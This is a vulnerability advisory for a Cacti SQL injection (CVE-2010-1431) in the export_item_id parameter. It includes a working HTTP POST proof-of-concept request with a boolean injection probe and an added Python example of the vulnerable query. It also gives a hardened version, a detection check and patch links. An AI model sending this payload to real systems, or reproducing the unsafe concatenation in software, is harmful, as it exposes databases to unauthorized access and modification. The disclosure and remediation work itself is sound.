Cacti 'export_item_id' Parameter SQL Injection Vulnerability
BID:39653
Info
| Bugtraq ID: | 39653 |
| Class: | Input Validation Error |
| CVE: | CVE-2010-1431 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 17 2010 12:00AM |
| Updated: | Aug 20 2010 10:53AM |
| Credit: | Nahuel Grisolia |
| Vulnerable: | S.u.S.E. openSUSE 11.0; Redhat HPC Solution EL5 5; Planet Technology WSW-2401 0.8.6 h; Planet Technology WSW-2401 0.8.6 g; MandrakeSoft Enterprise Server 5 x86_64; MandrakeSoft Enterprise Server 5; MandrakeSoft Corporate Server 4.0 x86_64; MandrakeSoft Corporate Server 4.0; Debian Linux 5.0 sparc; Debian Linux 5.0 s/390; Debian Linux 5.0 powerpc; Debian Linux 5.0 mipsel; Debian Linux 5.0 mips; Debian Linux 5.0 m68k; Debian Linux 5.0 ia-64; Debian Linux 5.0 ia-32; Debian Linux 5.0 hppa; Debian Linux 5.0 armel; Debian Linux 5.0 arm; Debian Linux 5.0 amd64; Debian Linux 5.0 alpha; Debian Linux 5.0; Cacti Cacti 0.8.7; Cacti Cacti 0.8.6 f; Cacti Cacti 0.8.6 c; Cacti Cacti 0.8.5 a; Cacti Cacti 0.8.5; Cacti Cacti 0.8.4; Cacti Cacti 0.8.3 a; Cacti Cacti 0.8.3; Cacti Cacti 0.8.2 a; Cacti Cacti 0.8.2; Cacti Cacti 0.8.1; Cacti Cacti 0.8; Cacti Cacti 0.8.7e; Cacti Cacti 0.8.7d; Cacti Cacti 0.8.7c; Cacti Cacti 0.8.7b; Cacti Cacti 0.8.7a; Cacti Cacti 0.8.6k; Cacti Cacti 0.8.6j; Cacti Cacti 0.8.6i |
| Not Vulnerable: | |
Discussion
Cacti is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Cacti versions 0.8.7e and prior are vulnerable.
Exploit / POC
Attackers can use a browser to exploit this issue.
The following example request is available:
```http
POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: www.example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://www.example.com7/cacti-0.8.7e/templates_export.php
Cookie: Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130

export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&save_component_export=1&action=save&x=24&y=12
```
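The request above carries a non-numeric value in a parameter that should only ever be a template id. The following is an added example, not Cacti's code and not part of the advisory: it contrasts the unsafe pattern (the raw POST value concatenated into the query) with a hardened form that validates the parameter as an integer and binds it, and it shows a simple check a defender can run over a captured request body. The table and rows are constructed stand-ins; the sqlite database and the function names are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed in-memory stand-in for Cacti's graph_template table (assumption).
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE graph_templates (id INTEGER PRIMARY KEY, name TEXT)")
DB.executemany("INSERT INTO graph_templates VALUES (?, ?)",
               [(17, "Interface Traffic"), (18, "Unix Load Average"), (19, "Ping Latency")])

# Request body taken from the advisory's example request.
POST_BODY = ("export_item_id=18 and 1=1&include_deps=on&output_format=3"
             "&export_type=graph_template&save_component_export=1&action=save&x=24&y=12")


def export_vulnerable(export_item_id: str) -> list:
    """Unsafe pattern: the POST value is pasted straight into the SQL text,
    so 'and 1=1' is executed as part of the WHERE clause."""
    sql = "SELECT id, name FROM graph_templates WHERE id=" + export_item_id
    return DB.execute(sql).fetchall()


def export_hardened(export_item_id: str) -> list:
    """Hardened form: accept only a decimal integer, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]+", export_item_id):
        raise ValueError("export_item_id must be numeric")
    sql = "SELECT id, name FROM graph_templates WHERE id=?"
    return DB.execute(sql, (int(export_item_id),)).fetchall()


def hardened_rejects(export_item_id: str) -> bool:
    """True when the hardened path refuses the value."""
    try:
        export_hardened(export_item_id)
        return False
    except ValueError:
        return True


def body_has_injected_export_id(body: str) -> bool:
    """Detection helper for captured requests: flag any export_item_id that is
    not a plain integer (spaces, quotes, operators, etc.)."""
    value = parse_qs(body, keep_blank_values=True).get("export_item_id", [""])[0]
    return re.fullmatch(r"[0-9]+", value) is None
```

With the page's body, `export_vulnerable("18 and 1=1")` still returns the row for id 18, which is exactly why a boolean probe like this reveals the flaw, while `export_hardened` refuses the value before any SQL runs.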
Solution / Fix
Solution:
Updates are available. Please see the references for more information.
Debian Linux 5.0 (all architectures: alpha, amd64, arm, armel, hppa, ia-32, ia-64, m68k, mips, mipsel, powerpc, s/390, sparc)
- Debian cacti_0.8.7b-2.1+lenny1_all.deb
  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1_all.deb
- Debian cacti_0.8.7b-2.1+lenny2_all.deb
  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny2_all.deb
MandrakeSoft Enterprise Server 5 and Enterprise Server 5 x86_64
- Mandriva cacti-0.8.7e-11.1mdvmes5.1.noarch.rpm
  http://www.mandriva.com/en/download/
MandrakeSoft Corporate Server 4.0 and Corporate Server 4.0 x86_64
- Mandriva cacti-0.8.7e-0.1.20060mlcs4.noarch.rpm
  http://www.mandriva.com/en/download/
Cacti Cacti 0.8.7e
- Cacti sql_injection_template_export.patch
  http://www.cacti.net/downloads/patches/0.8.7e/sql_injection_template_export.patch